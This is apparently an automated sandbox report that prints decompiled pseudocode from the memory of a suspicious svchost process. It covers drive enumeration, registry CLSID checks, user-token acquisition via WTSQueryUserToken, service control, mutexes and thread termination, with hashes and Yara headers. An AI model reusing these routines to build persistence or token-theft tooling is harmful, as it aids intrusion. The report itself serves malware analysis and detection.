                                                            				if (GetLogicalDriveStringsW(??, ??) == 0) goto 0xaf547c6f;
                                                            				_a24 = __rbp;
                                                            				_v32 = __r12;
                                                            				_t90 =  <  ? 0xffffffff : _t89;
                                                            				E0000022B22BAF55A828(2 *  &_v584 >> 0x20, _t90);
                                                            				r8d = 2 + _t92 * 2;
                                                            				_t127 = _t90;
                                                            				E0000022B22BAF563830(0, 0, _t75, _t77, _t90,  &_v584, _t120, _t130);
                                                            				if (GetLogicalDriveStringsW(??, ??) != 0) goto 0xaf547b34;
                                                            				E0000022B22BAF55A7E4(_t90, _t127);
                                                            				goto 0xaf547c5f;
                                                            				_t45 = L" :"; // 0x3a0020
                                                            				_v600 = _t45;
                                                            				_v24 = _t120;
                                                            				_v596 =  *0xaf5894b0 & 0x0000ffff;
                                                            				_v40 = __r15;
                                                            				E0000022B22BAF55A828(0, _t127);
                                                            				_a32 = __rsi;
                                                            				_t93 = _t127;
                                                            				r15d = 1;
                                                            				r8d = 0x104;
                                                            				_v600 =  *_t93 & 0x0000ffff;
                                                            				if (QueryDosDeviceW(??, ??, ??) != 0) goto 0xaf547be3;
                                                            				if (GetLastError() != 0x7a) goto 0xaf547c37;
                                                            				E0000022B22BAF55A7E4(_t90, _t90);
                                                            				_t91 =  <  ? 0xffffffff : _t90;
                                                            				E0000022B22BAF55A828(2 * __r15 >> 0x20,  <  ? 0xffffffff : _t90);
                                                            				r8d = r15d;
                                                            				if (QueryDosDeviceW(??, ??, ??) == 0) goto 0xaf547c37;
                                                            				r8d = lstrlenW(??);
                                                            				if (E0000022B22BAF564AA4( <  ? 0xffffffff : _t90,  &_v584, _t130) == 0) goto 0xaf547c19;
                                                            				_t57 =  *_t93 & 0x0000ffff;
                                                            				if (_t57 != 0) goto 0xaf547c02;
                                                            				if (_t93[1] != _t57) goto 0xaf547b80;
                                                            				goto 0xaf547c37;
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF55A7E4( <  ? 0xffffffff : _t90, _t127);
                                                            				E0000022B22BAF55A7E4(_t91, _t91);
                                                            				return E0000022B22BAF55A7C0( *_t93 & 0x0000ffff, _t91, _v56 ^ _t129);
                                                            			}

























                                                            0x22baf547a60
                                                            0x22baf547a6b
                                                            0x22baf547a72
                                                            0x22baf547a75
                                                            0x22baf547a80
                                                            0x22baf547a88
                                                            0x22baf547a8e
                                                            0x22baf547a9a
                                                            0x22baf547aa0
                                                            0x22baf547aa5
                                                            0x22baf547ab3
                                                            0x22baf547abb
                                                            0x22baf547acf
                                                            0x22baf547ad8
                                                            0x22baf547ae5
                                                            0x22baf547af7
                                                            0x22baf547afe
                                                            0x22baf547b03
                                                            0x22baf547b10
                                                            0x22baf547b13
                                                            0x22baf547b25
                                                            0x22baf547b2a
                                                            0x22baf547b2f
                                                            0x22baf547b34
                                                            0x22baf547b3f
                                                            0x22baf547b4a
                                                            0x22baf547b52
                                                            0x22baf547b57
                                                            0x22baf547b5f
                                                            0x22baf547b67
                                                            0x22baf547b6f
                                                            0x22baf547b72
                                                            0x22baf547b83
                                                            0x22baf547b89
                                                            0x22baf547b9e
                                                            0x22baf547ba9
                                                            0x22baf547bb2
                                                            0x22baf547bbf
                                                            0x22baf547bc6
                                                            0x22baf547bcb
                                                            0x22baf547be1
                                                            0x22baf547bec
                                                            0x22baf547c00
                                                            0x22baf547c02
                                                            0x22baf547c0c
                                                            0x22baf547c11
                                                            0x22baf547c17
                                                            0x22baf547c31
                                                            0x22baf547c3a
                                                            0x22baf547c42
                                                            0x22baf547c89

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlen
                                                            • String ID: %s%s
                                                            • API String ID: 2329635748-3252725368
                                                            • Opcode ID: f951ea32a3a171d581cd91cf2e3b1e39595b18b2d4264ef30d8f547b1439f873
                                                            • Instruction ID: 409c4ebb18fad8a94f0723a0e7e8bc5b01e6b16930a66231d6c90d10d245af12
                                                            • Opcode Fuzzy Hash: f951ea32a3a171d581cd91cf2e3b1e39595b18b2d4264ef30d8f547b1439f873
                                                            • Instruction Fuzzy Hash: 1C516E32714680A5EB71DBA2A84D3EA73A1FB89BC1F444115DD5A87B9BEF3EC105C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF572C18(void* __edx, char* __r8, void* __r9) {
                                                            				void* _t7;
                                                            				signed long long _t11;
                                                            				signed long long _t12;
                                                            				void* _t17;
                                                            
                                                            				_t16 = _t17 - 0x4f;
                                                            				_t18 = _t17 - 0xc0;
                                                            				_t11 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t12 = _t11 ^ _t17 - 0x000000c0;
                                                            				 *(_t17 - 0x4f + 0x3f) = _t12;
                                                            				if (__r9 - _t12 + 4 >= 0) goto 0xaf572c64;
                                                            				 *__r8 = 0;
                                                            				return E0000022B22BAF55A7C0(_t7, _t12 + 4,  *(_t16 + 0x3f) ^ _t18);
                                                            			}







                                                            0x22baf572c1a
                                                            0x22baf572c1f
                                                            0x22baf572c26
                                                            0x22baf572c2d
                                                            0x22baf572c30
                                                            0x22baf572c44
                                                            0x22baf572c46
                                                            0x22baf572c63

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: 717ece5167fd6c951f5009bca1d53894e83ab193da7e4a35b3170f996bbe70de
                                                            • Instruction ID: d28575ec8c3483aeb6cc7ad6544c825b8d2136254aca5fbb33bdc63d4ffa0b8d
                                                            • Opcode Fuzzy Hash: 717ece5167fd6c951f5009bca1d53894e83ab193da7e4a35b3170f996bbe70de
                                                            • Instruction Fuzzy Hash: 8041AB33601B44A9FB26CFA5E8497CD37A4E714798F414526AE5C07B96EF3AC025C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2517750250-1183003970
                                                            • Opcode ID: 0b0d1f2f2df76f6e39eef6271e450b7f8c4fa86827dcbf492fab52204f325640
                                                            • Instruction ID: 557dbae4e8d9bf0c88b687044ea8649c5bd2cfb8642157f38bc75d4ab09986a3
                                                            • Opcode Fuzzy Hash: 0b0d1f2f2df76f6e39eef6271e450b7f8c4fa86827dcbf492fab52204f325640
                                                            • Instruction Fuzzy Hash: 40515B73218B94E2EB31CF91F48C78AB7A5F7C4B94F500116EA8943A6ADF79C549CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$AllocateBlockCheckEnvironmentFreeInitializeMembershipProcessToken$AddressDestroyLibraryLoadProcUser
                                                            • String ID: WTSQueryUserToken$Wtsapi32.dll$h
                                                            • API String ID: 2971248214-4267400122
                                                            • Opcode ID: eaae5b69d0bd3c2b151fb193475a8a4b98db6a0384027639bbee685d1e0eb02e
                                                            • Instruction ID: ee4a9a028f3bd352a6c5b71fd232edf202d6ed72f29ad23619290e9b56787438
                                                            • Opcode Fuzzy Hash: eaae5b69d0bd3c2b151fb193475a8a4b98db6a0384027639bbee685d1e0eb02e
                                                            • Instruction Fuzzy Hash: BD414133604B85A6EB719F95F4483DAB3A5F788785F444529EACE43B5AEF39C094CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 28%
                                                            			E0000022B22BAF54BFA0(void* __eflags, void* __rcx) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				void* _v648;
                                                            				char _v656;
                                                            				char _v660;
                                                            				char _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				void* __rbx;
                                                            				void* _t44;
                                                            				void* _t51;
                                                            				void* _t52;
                                                            				signed long long _t60;
                                                            				long long _t64;
                                                            				long long _t65;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            				signed long long _t83;
                                                            
                                                            				_t60 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t60 ^ _t83;
                                                            				E0000022B22BAF549800(_t65, __rcx,  &_v632, _t82);
                                                            				_v660 = 4;
                                                            				_v664 = 0;
                                                            				wsprintfW(??, ??);
                                                            				r8d = _v660;
                                                            				E0000022B22BAF563830(_t44, 0, _t51, _t52,  &_v664, L"SOFTWARE\\Classes\\CLSID\\%s", _t81,  &_v632);
                                                            				_v656 = _t65;
                                                            				r9d = 0x20119;
                                                            				_v680 =  &_v656;
                                                            				r8d = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54c0d2;
                                                            				_v672 =  &_v660;
                                                            				_t64 =  &_v664;
                                                            				r8d = 0;
                                                            				_v680 = _t64;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t43 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t56 =  ==  ? 1 : 0;
                                                            				if (( ==  ? 1 : 0) == 0) goto 0xaf54c0d2;
                                                            				_v664 = _v664 + 0xfffffec4;
                                                            				if ((_v656 - 0x1fffffff & 0xefffffff) == 0) goto 0xaf54c0f1;
                                                            				wsprintfW(??, ??);
                                                            				OpenEventW(??, ??, ??);
                                                            				if (_t64 == 0) goto 0xaf54c0ef;
                                                            				CloseHandle(??);
                                                            				return E0000022B22BAF55A7C0(0x1f0003, _t64, _v24 ^ _t83);
                                                            			}






















                                                            0x22baf54bfa9
                                                            0x22baf54bfb3
                                                            0x22baf54bfc0
                                                            0x22baf54bfc7
                                                            0x22baf54bfd4
                                                            0x22baf54bfe7
                                                            0x22baf54bfed
                                                            0x22baf54bff9
                                                            0x22baf54c003
                                                            0x22baf54c008
                                                            0x22baf54c00e
                                                            0x22baf54c013
                                                            0x22baf54c02d
                                                            0x22baf54c03d
                                                            0x22baf54c047
                                                            0x22baf54c04c
                                                            0x22baf54c056
                                                            0x22baf54c05b
                                                            0x22baf54c068
                                                            0x22baf54c070
                                                            0x22baf54c076
                                                            0x22baf54c078
                                                            0x22baf54c084
                                                            0x22baf54c093
                                                            0x22baf54c0a9
                                                            0x22baf54c0be
                                                            0x22baf54c0c7
                                                            0x22baf54c0cc
                                                            0x22baf54c0ee

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                            • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 1348839613-2346361075
                                                            • Opcode ID: 13e48f42e489427479eefd822e829f2e49af3a9b2f823b032c9cf69266f59241
                                                            • Instruction ID: 299071d036a4ef9888e9bace4b2ea590d890fc7baaeb7fa94a035ee4269e72be
                                                            • Opcode Fuzzy Hash: 13e48f42e489427479eefd822e829f2e49af3a9b2f823b032c9cf69266f59241
                                                            • Instruction Fuzzy Hash: C431B433325B85A6EB21CF91F48C7DAB3A0FBC4744F801115A69E43A9ADF39C109CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E0000022B22BAF54D7E0(void* __edi, void* __eflags, long long __rbx, long long __rdi, void* __r8, long long _a8, long long _a16) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				char _v648;
                                                            				void* __rsi;
                                                            				signed long long _t43;
                                                            				signed long long _t44;
                                                            				long long _t45;
                                                            				long long _t58;
                                                            				void* _t61;
                                                            				void* _t63;
                                                            
                                                            				_t58 = __rdi;
                                                            				_t45 = __rbx;
                                                            				_a16 = __rbx;
                                                            				_t43 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t44 = _t43 ^ _t63 - 0x000002a0;
                                                            				_v24 = _t44;
                                                            				_v648 = 0;
                                                            				E0000022B22BAF54C100(__eflags,  &_v648, __rdi, _t61);
                                                            				_t62 = _t44;
                                                            				if (_t44 == 0) goto 0xaf54d8cf;
                                                            				_a8 = _t58;
                                                            				E0000022B22BAF549800(__rbx, L"rebootshutdown",  &_v632, _t44);
                                                            				wsprintfW(??, ??);
                                                            				CreateMutexW(??, ??, ??);
                                                            				if (_t44 == 0) goto 0xaf54d882;
                                                            				if (GetLastError() != 0xb7) goto 0xaf54d882;
                                                            				WaitForSingleObject(??, ??);
                                                            				if (E0000022B22BAF54CF80(0, _t45, _t44) != 0) goto 0xaf54d8a8;
                                                            				Sleep(??);
                                                            				if (E0000022B22BAF54CF80(1, _t45, _t44) == 0) goto 0xaf54d890;
                                                            				if (_t44 == 0) goto 0xaf54d8bf;
                                                            				ReleaseMutex(??);
                                                            				CloseHandle(??);
                                                            				E0000022B22BAF55A7E4(_t44, _t62);
                                                            				return E0000022B22BAF55A7C0(5, _t44, _v24 ^ _t63 - 0x000002a0);
                                                            			}














                                                            0x22baf54d7e0
                                                            0x22baf54d7e0
                                                            0x22baf54d7e0
                                                            0x22baf54d7ed
                                                            0x22baf54d7f4
                                                            0x22baf54d7f7
                                                            0x22baf54d806
                                                            0x22baf54d80a
                                                            0x22baf54d80f
                                                            0x22baf54d815
                                                            0x22baf54d820
                                                            0x22baf54d82f
                                                            0x22baf54d848
                                                            0x22baf54d85b
                                                            0x22baf54d867
                                                            0x22baf54d874
                                                            0x22baf54d87c
                                                            0x22baf54d88b
                                                            0x22baf54d897
                                                            0x22baf54d8a6
                                                            0x22baf54d8ab
                                                            0x22baf54d8b0
                                                            0x22baf54d8b9
                                                            0x22baf54d8c2
                                                            0x22baf54d8ef

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseQueryValue$MutexOpenwsprintf$CreateErrorHandleLastObjectReleaseSingleSleepWait
                                                            • String ID: Global\%s$rebootshutdown
                                                            • API String ID: 3033219564-2939806910
                                                            • Opcode ID: 87882329ecb1915067032cc862e5764066a434f0293172f8a78f4b9aa2aeab17
                                                            • Instruction ID: 472046e2f6dd5cae4dfb5ab005b5f7aa06f183af13378ec65c08ccc49a208a63
                                                            • Opcode Fuzzy Hash: 87882329ecb1915067032cc862e5764066a434f0293172f8a78f4b9aa2aeab17
                                                            • Instruction Fuzzy Hash: 7E218333605B84B2FB329BA0E45E3EA73A2FB84B85F454511D94A02B9BDF3EC005CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F69(void* __rax, long long __rbx, long long _a120) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t18;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t18);
                                                            				goto 0xaf546b40;
                                                            				_a120 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t18, _t20, _t24, _t25, _t26);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t18 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}











                                                            0x22baf545f69
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
                                                            • String ID:
                                                            • API String ID: 3671983395-0
                                                            • Opcode ID: 1d2ae70eb742d11d9b0820137612087e259c746ecb2b3f78082d02e006878018
                                                            • Instruction ID: a1cdd1a14e45031a99ee5cf44ffac0f52f6ad850af393cd4a90af44a677e7356
                                                            • Opcode Fuzzy Hash: 1d2ae70eb742d11d9b0820137612087e259c746ecb2b3f78082d02e006878018
                                                            • Instruction Fuzzy Hash: D8316F32314B54A6EF36DB52B85C3A9B7A5FB89B81F040125DE9947B9ADF3EC4058700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E0000022B22BAF538B60(long long __rax, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                            				void* _t28;
                                                            				void* _t31;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				long long _t42;
                                                            				intOrPtr* _t45;
                                                            
                                                            				_t42 = __rax;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_a24 = __rdi;
                                                            				_t45 = __rcx;
                                                            				 *__rcx = 0;
                                                            				 *((long long*)(__rcx + 0x20)) = __rax;
                                                            				 *((long long*)(__rcx + 0x30)) = __rax;
                                                            				 *((short*)(__rcx + 0x28)) = 2;
                                                            				LoadLibraryA(??);
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				GetProcAddress(??, ??);
                                                            				 *((long long*)(__rcx + 8)) = __rax;
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				GetProcAddress(??, ??);
                                                            				 *((long long*)(__rcx + 0x10)) = __rax;
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				GetProcAddress(??, ??);
                                                            				 *((long long*)(__rcx + 0x18)) = __rax;
                                                            				if (__rax == 0) goto 0xaf538c29;
                                                            				if ( *((intOrPtr*)(__rcx + 8))() != 0) goto 0xaf538c29;
                                                            				E0000022B22BAF55A828(_t31, __rax);
                                                            				 *((long long*)(__rcx + 0x30)) = _t42;
                                                            				if (_t42 == 0) goto 0xaf538c29;
                                                            				r8d =  *((intOrPtr*)(__rcx + 0x20));
                                                            				_t28 = E0000022B22BAF563830( *((intOrPtr*)(__rcx + 0x20)), 0, _t33, _t34, _t42, __rcx + 0x20, __rdi, __rcx + 0x24);
                                                            				 *_t45 = 1;
                                                            				return _t28;
                                                            			}









                                                            0x22baf538b60
                                                            0x22baf538b60
                                                            0x22baf538b65
                                                            0x22baf538b6a
                                                            0x22baf538b77
                                                            0x22baf538b7a
                                                            0x22baf538b7c
                                                            0x22baf538b80
                                                            0x22baf538b89
                                                            0x22baf538b94
                                                            0x22baf538ba0
                                                            0x22baf538bb0
                                                            0x22baf538bb6
                                                            0x22baf538bbd
                                                            0x22baf538bc9
                                                            0x22baf538bcf
                                                            0x22baf538bd6
                                                            0x22baf538be2
                                                            0x22baf538be8
                                                            0x22baf538bef
                                                            0x22baf538c02
                                                            0x22baf538c07
                                                            0x22baf538c0c
                                                            0x22baf538c13
                                                            0x22baf538c15
                                                            0x22baf538c1e
                                                            0x22baf538c23
                                                            0x22baf538c41

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                            • API String ID: 2238633743-2202537490
                                                            • Opcode ID: b2fd1c3da6a43bd36a118979feb720e0a350d83a7864e98477ea050774342f8b
                                                            • Instruction ID: ebce8d7a1c4aafe027eb69adc324f60943a2d7b5d9b77ef6711afb6efa7d2c7f
                                                            • Opcode Fuzzy Hash: b2fd1c3da6a43bd36a118979feb720e0a350d83a7864e98477ea050774342f8b
                                                            • Instruction Fuzzy Hash: EA217C77212B44A1EF6ADFAAE45C29873B0FB08B84F041525CA4C4739AEF3AC455C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 42%
                                                            			E0000022B22BAF53B6F0(void* __edx, WCHAR* __rbx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                                            				signed int _t45;
                                                            				signed char _t73;
                                                            				signed long long _t83;
                                                            				signed long long _t86;
                                                            				WCHAR* _t93;
                                                            				WCHAR* _t97;
                                                            				WCHAR* _t101;
                                                            				long long _t113;
                                                            				void* _t116;
                                                            				signed int* _t117;
                                                            				void* _t119;
                                                            				signed long long _t120;
                                                            				signed long long _t121;
                                                            
                                                            				_t124 = __r9;
                                                            				_t113 = __rdi;
                                                            				_t93 = __rbx;
                                                            				_t120 = _t119 - 0x240;
                                                            				_t83 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t120 + 0x230) = _t83 ^ _t120;
                                                            				r9d = 0;
                                                            				_t3 = _t124 + 8; // 0x8
                                                            				r8d = _t3;
                                                            				E0000022B22BAF549B50(__rbx, L"winssyslog", _t120 + 0x20, __r9);
                                                            				_t45 = GetFileAttributesW(__rbx) & 0xffffff00 | _t44 != 0xffffffff;
                                                            				 *0xaf599c11 = _t45;
                                                            				if (_t45 != 0) goto 0xaf53b757;
                                                            				Sleep(??);
                                                            				_t73 =  *0xaf599c11; // 0x0
                                                            				if (_t73 == 0) goto 0xaf53b744;
                                                            				E0000022B22BAF53D9E0(_t73);
                                                            				if (( *0xaf599c11 & 0x000000ff) != 1) goto 0xaf53b786;
                                                            				asm("o16 nop [eax+eax]");
                                                            				Sleep(??);
                                                            				if (( *0xaf599c11 & 0x000000ff) == 1) goto 0xaf53b770;
                                                            				_t97 =  *0xaf599e30; // 0x0
                                                            				if (_t97 == 0) goto 0xaf53b740;
                                                            				if ( *((intOrPtr*)(_t97 + 8)) == 0) goto 0xaf53b7c3;
                                                            				TerminateThread(??, ??);
                                                            				CloseHandle(??);
                                                            				_t101 =  *0xaf599e30; // 0x0
                                                            				 *(_t101 + 8) = _t93;
                                                            				UnmapViewOfFile(??);
                                                            				CloseHandle(??);
                                                            				 *0xaf599e30 = _t93;
                                                            				goto 0xaf53b740;
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				 *(_t120 + 8) = _t93;
                                                            				 *((long long*)(_t120 + 0x10)) = __rdi;
                                                            				_t117 = _t120 - 0x10;
                                                            				_t121 = _t120 - 0x110;
                                                            				_t86 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *_t117 = _t86 ^ _t121;
                                                            				E0000022B22BAF538B60(_t86 ^ _t121, _t93, _t121 + 0x50, __rdi, __rsi);
                                                            				 *((char*)(_t117 - 0x40)) = 0x43;
                                                            				 *((long long*)(_t117 - 0x60)) = _t113;
                                                            				 *((long long*)(_t117 - 0x68)) = 0xaf588810;
                                                            				 *((long long*)(_t117 - 0x50)) = _t113;
                                                            				 *((long long*)(_t117 - 0x58)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t117 - 0x18)) = 0;
                                                            				 *((long long*)(_t117 - 0x28)) = _t113;
                                                            				 *((long long*)(_t117 - 0x20)) = _t113;
                                                            				 *((intOrPtr*)(_t117 - 0x3c)) = 0;
                                                            				 *((long long*)(_t117 - 0x78)) = _t113;
                                                            				 *((long long*)(_t117 - 0x70)) = _t113;
                                                            				 *((long long*)(_t117 - 0x48)) = _t113;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t117 - 0x38)) = _t113;
                                                            				if (( *(_t117 - 0x10) & 0x0000ffff) != 1) goto 0xaf53b91d;
                                                            				 *((short*)(_t121 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t121 + 0x20)) = _t113;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 - 0x78))))))(_t116) != 0) goto 0xaf53b988;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t121 + 0x50);
                                                            				if ( *((intOrPtr*)(_t117 - 0x28)) == 0) goto 0xaf53b8cb;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t117 - 0x78)))),  *((intOrPtr*)(_t117 - 0x28)));
                                                            				 *((long long*)(_t117 - 0x58)) = 0xaf588690;
                                                            				 *((long long*)(_t117 - 0x68)) = 0xaf588790;
                                                            				 *((intOrPtr*)(_t117 - 0x18)) = 0;
                                                            				 *((long long*)(_t117 - 0x28)) = _t113;
                                                            				 *((long long*)(_t117 - 0x20)) = _t113;
                                                            				if ( *((intOrPtr*)(_t117 - 0x80)) == 0) goto 0xaf53b8fa;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t117 - 0x80)));
                                                            				return E0000022B22BAF55A7C0(0x64, 0xaf588790,  *_t117 ^ _t121);
                                                            			}
















                                                            0x22baf53b6f0
                                                            0x22baf53b6f0
                                                            0x22baf53b6f0
                                                            0x22baf53b6f2
                                                            0x22baf53b6f9
                                                            0x22baf53b703
                                                            0x22baf53b70b
                                                            0x22baf53b71a
                                                            0x22baf53b71a
                                                            0x22baf53b71e
                                                            0x22baf53b731
                                                            0x22baf53b736
                                                            0x22baf53b742
                                                            0x22baf53b749
                                                            0x22baf53b74f
                                                            0x22baf53b755
                                                            0x22baf53b757
                                                            0x22baf53b765
                                                            0x22baf53b767
                                                            0x22baf53b775
                                                            0x22baf53b784
                                                            0x22baf53b786
                                                            0x22baf53b790
                                                            0x22baf53b799
                                                            0x22baf53b7a1
                                                            0x22baf53b7b2
                                                            0x22baf53b7b8
                                                            0x22baf53b7bf
                                                            0x22baf53b7c3
                                                            0x22baf53b7d0
                                                            0x22baf53b7dd
                                                            0x22baf53b7e4
                                                            0x22baf53b7e9
                                                            0x22baf53b7ea
                                                            0x22baf53b7eb
                                                            0x22baf53b7ec
                                                            0x22baf53b7ed
                                                            0x22baf53b7ee
                                                            0x22baf53b7ef
                                                            0x22baf53b7f0
                                                            0x22baf53b7f5
                                                            0x22baf53b7fb
                                                            0x22baf53b800
                                                            0x22baf53b807
                                                            0x22baf53b811
                                                            0x22baf53b821
                                                            0x22baf53b828
                                                            0x22baf53b833
                                                            0x22baf53b837
                                                            0x22baf53b847
                                                            0x22baf53b84e
                                                            0x22baf53b852
                                                            0x22baf53b855
                                                            0x22baf53b859
                                                            0x22baf53b85d
                                                            0x22baf53b860
                                                            0x22baf53b864
                                                            0x22baf53b868
                                                            0x22baf53b86c
                                                            0x22baf53b875
                                                            0x22baf53b87d
                                                            0x22baf53b885
                                                            0x22baf53b896
                                                            0x22baf53b89b
                                                            0x22baf53b89e
                                                            0x22baf53b8aa
                                                            0x22baf53b8b8
                                                            0x22baf53b8c4
                                                            0x22baf53b8c6
                                                            0x22baf53b8d6
                                                            0x22baf53b8e1
                                                            0x22baf53b8e5
                                                            0x22baf53b8e8
                                                            0x22baf53b8ec
                                                            0x22baf53b8f3
                                                            0x22baf53b8f5
                                                            0x22baf53b91c

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
                                                            • String ID: winssyslog
                                                            • API String ID: 3677296445-1874786851
                                                            • Opcode ID: c3fc35c69c9f4140baecf469e7fb03b97643cd1533679d2c657eb767cf2832fd
